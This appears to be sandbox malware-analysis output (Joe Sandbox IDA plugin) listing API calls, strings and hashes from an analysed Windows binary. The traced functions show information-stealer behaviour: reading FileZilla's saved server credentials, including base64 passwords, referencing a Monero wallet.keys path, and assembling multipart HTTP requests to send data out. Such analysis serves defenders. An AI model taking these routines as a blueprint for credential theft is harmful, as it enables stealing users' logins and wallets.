GetProcAddress.KERNEL32(75900000,00CD5B48), ref: 00059D69
GetProcAddress.KERNEL32(75900000,00CD5B68), ref: 00059D82
GetProcAddress.KERNEL32(75900000,00CEC9B0), ref: 00059D9A
GetProcAddress.KERNEL32(75900000,00CECBA8), ref: 00059DB2
GetProcAddress.KERNEL32(75900000,00CDAFB0), ref: 00059DCB
GetProcAddress.KERNEL32(75900000,00CD5B88), ref: 00059DE3
GetProcAddress.KERNEL32(75900000,00CEC998), ref: 00059DFB
GetProcAddress.KERNEL32(75900000,00CECB90), ref: 00059E14
GetProcAddress.KERNEL32(75900000,00CECAE8), ref: 00059E2C
GetProcAddress.KERNEL32(75900000,00CECAB8), ref: 00059E44
GetProcAddress.KERNEL32(75900000,00CD5BA8), ref: 00059E5D
GetProcAddress.KERNEL32(75900000,00CECB78), ref: 00059E75
GetProcAddress.KERNEL32(75900000,00CECB48), ref: 00059E8D
GetProcAddress.KERNEL32(75900000,00CECB00), ref: 00059EA6
GetProcAddress.KERNEL32(75900000,00CECC38), ref: 00059EBE
GetProcAddress.KERNEL32(75900000,00CECBC0), ref: 00059ED6
GetProcAddress.KERNEL32(75900000,00CEC9C8), ref: 00059EEF
GetProcAddress.KERNEL32(75900000,00CECA10), ref: 00059F07
GetProcAddress.KERNEL32(75900000,00CECB60), ref: 00059F1F
GetProcAddress.KERNEL32(75900000,00CEC980), ref: 00059F38
GetProcAddress.KERNEL32(75900000,00CE9AD8), ref: 00059F50
GetProcAddress.KERNEL32(75900000,00CECBF0), ref: 00059F68
GetProcAddress.KERNEL32(75900000,00CECA70), ref: 00059F81
GetProcAddress.KERNEL32(75900000,00CD5BC8), ref: 00059F99
GetProcAddress.KERNEL32(75900000,00CECC20), ref: 00059FB1
GetProcAddress.KERNEL32(75900000,00CD5BE8), ref: 00059FCA
GetProcAddress.KERNEL32(75900000,00CECA28), ref: 00059FE2
GetProcAddress.KERNEL32(75900000,00CECAD0), ref: 00059FFA
GetProcAddress.KERNEL32(75900000,00CD5A08), ref: 0005A013
GetProcAddress.KERNEL32(75900000,00CD5768), ref: 0005A02B
LoadLibraryA.KERNEL32(00CECC50,?,00055CA3,00060AEB,?,?,?,?,?,?,?,?,?,?,00060AEA,00060AE3), ref: 0005A03D
LoadLibraryA.KERNEL32(00CECA40,?,00055CA3,00060AEB,?,?,?,?,?,?,?,?,?,?,00060AEA,00060AE3), ref: 0005A04E
LoadLibraryA.KERNEL32(00CECB30,?,00055CA3,00060AEB,?,?,?,?,?,?,?,?,?,?,00060AEA,00060AE3), ref: 0005A060
LoadLibraryA.KERNEL32(00CEC9E0,?,00055CA3,00060AEB,?,?,?,?,?,?,?,?,?,?,00060AEA,00060AE3), ref: 0005A072
LoadLibraryA.KERNEL32(00CECA58,?,00055CA3,00060AEB,?,?,?,?,?,?,?,?,?,?,00060AEA,00060AE3), ref: 0005A083
LoadLibraryA.KERNEL32(00CECBD8,?,00055CA3,00060AEB,?,?,?,?,?,?,?,?,?,?,00060AEA,00060AE3), ref: 0005A095
LoadLibraryA.KERNEL32(00CECDE8,?,00055CA3,00060AEB,?,?,?,?,?,?,?,?,?,?,00060AEA,00060AE3), ref: 0005A0A7
LoadLibraryA.KERNEL32(00CECC98,?,00055CA3,00060AEB,?,?,?,?,?,?,?,?,?,?,00060AEA,00060AE3), ref: 0005A0B8
GetProcAddress.KERNEL32(75FD0000,00CD5828), ref: 0005A0DA
GetProcAddress.KERNEL32(75FD0000,00CECCC8), ref: 0005A0F2
GetProcAddress.KERNEL32(75FD0000,00CE8990), ref: 0005A10A
GetProcAddress.KERNEL32(75FD0000,00CECC80), ref: 0005A123
GetProcAddress.KERNEL32(75FD0000,00CD5948), ref: 0005A13B
GetProcAddress.KERNEL32(6FD30000,00CDAFD8), ref: 0005A160
GetProcAddress.KERNEL32(6FD30000,00CD5848), ref: 0005A179
GetProcAddress.KERNEL32(6FD30000,00CDADA8), ref: 0005A191
GetProcAddress.KERNEL32(6FD30000,00CECCE0), ref: 0005A1A9
GetProcAddress.KERNEL32(6FD30000,00CECDD0), ref: 0005A1C2
GetProcAddress.KERNEL32(6FD30000,00CD5728), ref: 0005A1DA
GetProcAddress.KERNEL32(6FD30000,00CD5A28), ref: 0005A1F2
GetProcAddress.KERNEL32(6FD30000,00CECE00), ref: 0005A20B
GetProcAddress.KERNEL32(763B0000,00CD59C8), ref: 0005A22C
GetProcAddress.KERNEL32(763B0000,00CD58A8), ref: 0005A244
GetProcAddress.KERNEL32(763B0000,00CECDB8), ref: 0005A25D
GetProcAddress.KERNEL32(763B0000,00CECCF8), ref: 0005A275
GetProcAddress.KERNEL32(763B0000,00CD5A48), ref: 0005A28D
GetProcAddress.KERNEL32(750F0000,00CDAE20), ref: 0005A2B3
GetProcAddress.KERNEL32(750F0000,00CDAE48), ref: 0005A2CB
GetProcAddress.KERNEL32(750F0000,00CECD10), ref: 0005A2E3
GetProcAddress.KERNEL32(750F0000,00CD57C8), ref: 0005A2FC
GetProcAddress.KERNEL32(750F0000,00CD5748), ref: 0005A314
GetProcAddress.KERNEL32(750F0000,00CDAE98), ref: 0005A32C
GetProcAddress.KERNEL32(75A50000,00CECD28), ref: 0005A352
GetProcAddress.KERNEL32(75A50000,00CD58C8), ref: 0005A36A
GetProcAddress.KERNEL32(75A50000,00CE89E0), ref: 0005A382
GetProcAddress.KERNEL32(75A50000,00CECD40), ref: 0005A39B
GetProcAddress.KERNEL32(75A50000,00CECD58), ref: 0005A3B3
GetProcAddress.KERNEL32(75A50000,00CD58E8), ref: 0005A3CB
GetProcAddress.KERNEL32(75A50000,00CD59E8), ref: 0005A3E4
GetProcAddress.KERNEL32(75A50000,00CECCB0), ref: 0005A3FC
GetProcAddress.KERNEL32(75A50000,00CECD70), ref: 0005A414
GetProcAddress.KERNEL32(75070000,00CD5868), ref: 0005A436
GetProcAddress.KERNEL32(75070000,00CECD88), ref: 0005A44E
GetProcAddress.KERNEL32(75070000,00CECDA0), ref: 0005A466
GetProcAddress.KERNEL32(75070000,00CECE18), ref: 0005A47F
GetProcAddress.KERNEL32(75070000,00CECC68), ref: 0005A497
GetProcAddress.KERNEL32(74E50000,00CD5A88), ref: 0005A4B8
GetProcAddress.KERNEL32(74E50000,00CD56C8), ref: 0005A4D1
GetProcAddress.KERNEL32(75320000,00CD5AA8), ref: 0005A4F2
GetProcAddress.KERNEL32(75320000,00CEC6B0), ref: 0005A50A
GetProcAddress.KERNEL32(6F060000,00CD56E8), ref: 0005A530
GetProcAddress.KERNEL32(6F060000,00CD5908), ref: 0005A548
GetProcAddress.KERNEL32(6F060000,00CD57E8), ref: 0005A560
GetProcAddress.KERNEL32(6F060000,00CEC7A0), ref: 0005A579
GetProcAddress.KERNEL32(6F060000,00CD5788), ref: 0005A591
GetProcAddress.KERNEL32(6F060000,00CD5888), ref: 0005A5A9
GetProcAddress.KERNEL32(6F060000,00CD57A8), ref: 0005A5C2
GetProcAddress.KERNEL32(6F060000,00CD5A68), ref: 0005A5DA
GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0005A5F1
GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0005A607
GetProcAddress.KERNEL32(74E00000,00CEC8C0), ref: 0005A629
GetProcAddress.KERNEL32(74E00000,00CE8A10), ref: 0005A641
GetProcAddress.KERNEL32(74E00000,00CEC878), ref: 0005A659
GetProcAddress.KERNEL32(74E00000,00CEC680), ref: 0005A672
GetProcAddress.KERNEL32(74DF0000,00CD5968), ref: 0005A693
GetProcAddress.KERNEL32(6E350000,00CEC860), ref: 0005A6B4
GetProcAddress.KERNEL32(6E350000,00CD5928), ref: 0005A6CD
GetProcAddress.KERNEL32(6E350000,00CEC668), ref: 0005A6E5
GetProcAddress.KERNEL32(6E350000,00CEC7B8), ref: 0005A6FD

Strings

InternetSetOptionA, xrefs: 0005A5E5
HttpQueryInfoA, xrefs: 0005A5FC

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: a493afc972b4740c7df994b076c246e2a63c8c83906fa4cc9cda697022b81379
Instruction ID: ba0f51468e14bb8fee6cbffbf0a12d4f511d403f9d85cbc256a9b155512dcef4
Opcode Fuzzy Hash: a493afc972b4740c7df994b076c246e2a63c8c83906fa4cc9cda697022b81379
Instruction Fuzzy Hash: 1D621ABD503200AFF744DFA8FD8C95AB7F9F748701714851BA609C7268DE39A452EB22

Function 00047710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00047724
RtlAllocateHeap.NTDLL(00000000), ref: 0004772B
lstrcat.KERNEL32(?,00CE9240), ref: 000478DB
lstrcat.KERNEL32(?,?), ref: 000478EF
lstrcat.KERNEL32(?,?), ref: 00047903
lstrcat.KERNEL32(?,?), ref: 00047917
lstrcat.KERNEL32(?,00CEE950), ref: 0004792B
lstrcat.KERNEL32(?,00CEE7A0), ref: 0004793F
lstrcat.KERNEL32(?,00CEE8C0), ref: 00047952
lstrcat.KERNEL32(?,00CEE7E8), ref: 00047966
lstrcat.KERNEL32(?,00CE92C8), ref: 0004797A
lstrcat.KERNEL32(?,?), ref: 0004798E
lstrcat.KERNEL32(?,?), ref: 000479A2
lstrcat.KERNEL32(?,?), ref: 000479B6
lstrcat.KERNEL32(?,00CEE950), ref: 000479C9
lstrcat.KERNEL32(?,00CEE7A0), ref: 000479DD
lstrcat.KERNEL32(?,00CEE8C0), ref: 000479F1
lstrcat.KERNEL32(?,00CEE7E8), ref: 00047A04
lstrcat.KERNEL32(?,00CEEE58), ref: 00047A18
lstrcat.KERNEL32(?,?), ref: 00047A2C
lstrcat.KERNEL32(?,?), ref: 00047A40
lstrcat.KERNEL32(?,?), ref: 00047A54
lstrcat.KERNEL32(?,00CEE950), ref: 00047A68
lstrcat.KERNEL32(?,00CEE7A0), ref: 00047A7B
lstrcat.KERNEL32(?,00CEE8C0), ref: 00047A8F
lstrcat.KERNEL32(?,00CEE7E8), ref: 00047AA3
lstrcat.KERNEL32(?,00CEEEC0), ref: 00047AB6
lstrcat.KERNEL32(?,?), ref: 00047ACA
lstrcat.KERNEL32(?,?), ref: 00047ADE
lstrcat.KERNEL32(?,?), ref: 00047AF2
lstrcat.KERNEL32(?,00CEE950), ref: 00047B06
lstrcat.KERNEL32(?,00CEE7A0), ref: 00047B1A
lstrcat.KERNEL32(?,00CEE8C0), ref: 00047B2D
lstrcat.KERNEL32(?,00CEE7E8), ref: 00047B41
lstrcat.KERNEL32(?,00CEEF28), ref: 00047B55
lstrcat.KERNEL32(?,?), ref: 00047B69
lstrcat.KERNEL32(?,?), ref: 00047B7D
lstrcat.KERNEL32(?,?), ref: 00047B91
lstrcat.KERNEL32(?,00CEE950), ref: 00047BA4
lstrcat.KERNEL32(?,00CEE7A0), ref: 00047BB8
lstrcat.KERNEL32(?,00CEE8C0), ref: 00047BCC
lstrcat.KERNEL32(?,00CEE7E8), ref: 00047BDF
lstrcat.KERNEL32(?,00CEEF90), ref: 00047BF3
lstrcat.KERNEL32(?,?), ref: 00047C07
lstrcat.KERNEL32(?,?), ref: 00047C1B
lstrcat.KERNEL32(?,?), ref: 00047C2F
lstrcat.KERNEL32(?,00CEE950), ref: 00047C43
lstrcat.KERNEL32(?,00CEE7A0), ref: 00047C56
lstrcat.KERNEL32(?,00CEE8C0), ref: 00047C6A
lstrcat.KERNEL32(?,00CEE7E8), ref: 00047C7E

Part of subcall function 000475D0: lstrcat.KERNEL32(354C8020,000617FC), ref: 00047606
Part of subcall function 000475D0: lstrcat.KERNEL32(354C8020,00000000), ref: 00047648
Part of subcall function 000475D0: lstrcat.KERNEL32(354C8020, : ), ref: 0004765A
Part of subcall function 000475D0: lstrcat.KERNEL32(354C8020,00000000), ref: 0004768F
Part of subcall function 000475D0: lstrcat.KERNEL32(354C8020,00061804), ref: 000476A0
Part of subcall function 000475D0: lstrcat.KERNEL32(354C8020,00000000), ref: 000476D3
Part of subcall function 000475D0: lstrcat.KERNEL32(354C8020,00061808), ref: 000476ED
Part of subcall function 000475D0: task.LIBCPMTD ref: 000476FB

lstrcat.KERNEL32(?,00CEF1E8), ref: 00047E0B
lstrcat.KERNEL32(?,00CED390), ref: 00047E1E
lstrlen.KERNEL32(354C8020), ref: 00047E2B
lstrlen.KERNEL32(354C8020), ref: 00047E3B

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID:
API String ID: 928082926-0
Opcode ID: d3da390b31371927d2315dfc6a0c9ff4ee969e643f4deb9ba29e9d6ebf09693e
Instruction ID: 608dc130c8df965b21ab8d11121fbbc77d7350af4161536edea987583054247e
Opcode Fuzzy Hash: d3da390b31371927d2315dfc6a0c9ff4ee969e643f4deb9ba29e9d6ebf09693e
Instruction Fuzzy Hash: C93221B6C00314ABD715EBA0EC89DEA737CBB44701F444A99F60D62091EE74E7898F61

Function 00050250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

Part of subcall function 00058DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00058E0B

Part of subcall function 0005A920: lstrcpy.KERNEL32(00000000,?), ref: 0005A972
Part of subcall function 0005A920: lstrcat.KERNEL32(00000000), ref: 0005A982

Part of subcall function 0005A8A0: lstrcpy.KERNEL32(?,00060E17), ref: 0005A905

Part of subcall function 0005A9B0: lstrlen.KERNEL32(?,00CE8690,?,\Monero\wallet.keys,00060E17), ref: 0005A9C5
Part of subcall function 0005A9B0: lstrcpy.KERNEL32(00000000), ref: 0005AA04
Part of subcall function 0005A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0005AA12

Part of subcall function 0005A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0005A7E6

Part of subcall function 000499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000499EC
Part of subcall function 000499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00049A11
Part of subcall function 000499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00049A31
Part of subcall function 000499C0: ReadFile.KERNEL32(000000FF,?,00000000,0004148F,00000000), ref: 00049A5A
Part of subcall function 000499C0: LocalFree.KERNEL32(0004148F), ref: 00049A90
Part of subcall function 000499C0: CloseHandle.KERNEL32(000000FF), ref: 00049A9A

Part of subcall function 00058E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00058E52

GetProcessHeap.KERNEL32(00000000,000F423F,00060DBA,00060DB7,00060DB6,00060DB3), ref: 00050362
RtlAllocateHeap.NTDLL(00000000), ref: 00050369
StrStrA.SHLWAPI(00000000,<Host>), ref: 00050385
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00060DB2), ref: 00050393
StrStrA.SHLWAPI(00000000,<Port>), ref: 000503CF
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00060DB2), ref: 000503DD
StrStrA.SHLWAPI(00000000,<User>), ref: 00050419
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00060DB2), ref: 00050427
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00050463
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00060DB2), ref: 00050475
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00060DB2), ref: 00050502
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00060DB2), ref: 0005051A
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00060DB2), ref: 00050532
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00060DB2), ref: 0005054A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 00050562
lstrcat.KERNEL32(?,profile: null), ref: 00050571
lstrcat.KERNEL32(?,url: ), ref: 00050580
lstrcat.KERNEL32(?,00000000), ref: 00050593
lstrcat.KERNEL32(?,00061678), ref: 000505A2
lstrcat.KERNEL32(?,00000000), ref: 000505B5
lstrcat.KERNEL32(?,0006167C), ref: 000505C4
lstrcat.KERNEL32(?,login: ), ref: 000505D3
lstrcat.KERNEL32(?,00000000), ref: 000505E6
lstrcat.KERNEL32(?,00061688), ref: 000505F5
lstrcat.KERNEL32(?,password: ), ref: 00050604
lstrcat.KERNEL32(?,00000000), ref: 00050617
lstrcat.KERNEL32(?,00061698), ref: 00050626
lstrcat.KERNEL32(?,0006169C), ref: 00050635
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00060DB2), ref: 0005068E

Strings

<Host>, xrefs: 0005037C
url: , xrefs: 00050577
<Pass encoding="base64">, xrefs: 0005045A
<User>, xrefs: 00050410
browser: FileZilla, xrefs: 00050559
profile: null, xrefs: 00050568
password: , xrefs: 000505FB
login: , xrefs: 000505CA
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 000502A4
<Port>, xrefs: 000503C6

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1942843190-555421843
Opcode ID: 8bc631d164a9b0cd73547bb315cd2c70bb44841797c109e68fa8ede3e82ba1c0
Instruction ID: 2be26cee47eb2069b68d469dd58cf2a6fce4a2338e8f5623d7711289cbd15e8c
Opcode Fuzzy Hash: 8bc631d164a9b0cd73547bb315cd2c70bb44841797c109e68fa8ede3e82ba1c0
Instruction Fuzzy Hash: B2D14175A00108ABDB04EBF0DD9AEFF7779BF15301F444519F902A6092EF74AA09CB62

Function 00045100 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0005A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0005A7E6

Part of subcall function 000447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00044839
Part of subcall function 000447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00044849

lstrlen.KERNEL32(00000000), ref: 00045193

Part of subcall function 00058EA0: CryptBinaryToStringA.CRYPT32(00000000,00045184,40000001,00000000,00000000,?,00045184), ref: 00058EC0

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00045207
StrCmpCA.SHLWAPI(?,00CEF068), ref: 00045225
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00045340
HttpOpenRequestA.WININET(00000000,00CEF098,?,00CEEA28,00000000,00000000,00400100,00000000), ref: 000453A4

Part of subcall function 0005A9B0: lstrlen.KERNEL32(?,00CE8690,?,\Monero\wallet.keys,00060E17), ref: 0005A9C5
Part of subcall function 0005A9B0: lstrcpy.KERNEL32(00000000), ref: 0005AA04
Part of subcall function 0005A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0005AA12

Part of subcall function 0005A8A0: lstrcpy.KERNEL32(?,00060E17), ref: 0005A905

Part of subcall function 0005A920: lstrcpy.KERNEL32(00000000,?), ref: 0005A972
Part of subcall function 0005A920: lstrcat.KERNEL32(00000000), ref: 0005A982

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,00CEF128,00000000,?,00CE99E8,00000000,?,000619DC,00000000,?,000551CF), ref: 00045737
lstrlen.KERNEL32(00000000), ref: 0004574B
GetProcessHeap.KERNEL32(00000000,?), ref: 0004575C
RtlAllocateHeap.NTDLL(00000000), ref: 00045763
lstrlen.KERNEL32(00000000), ref: 00045778
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 000457A9
lstrlen.KERNEL32(00000000), ref: 000457C8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 000457E1
lstrlen.KERNEL32(00000000,?,?), ref: 0004580E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00045822
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0004584D
InternetCloseHandle.WININET(00000000), ref: 000458B1
InternetCloseHandle.WININET(00000000), ref: 000458BE
InternetCloseHandle.WININET(00000000), ref: 000458C8

Strings

--, xrefs: 00045280
------, xrefs: 000454F9
", xrefs: 000455C4
------, xrefs: 00045297
------, xrefs: 0004563B
", xrefs: 00045482
", xrefs: 00045706
------, xrefs: 000453B7

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
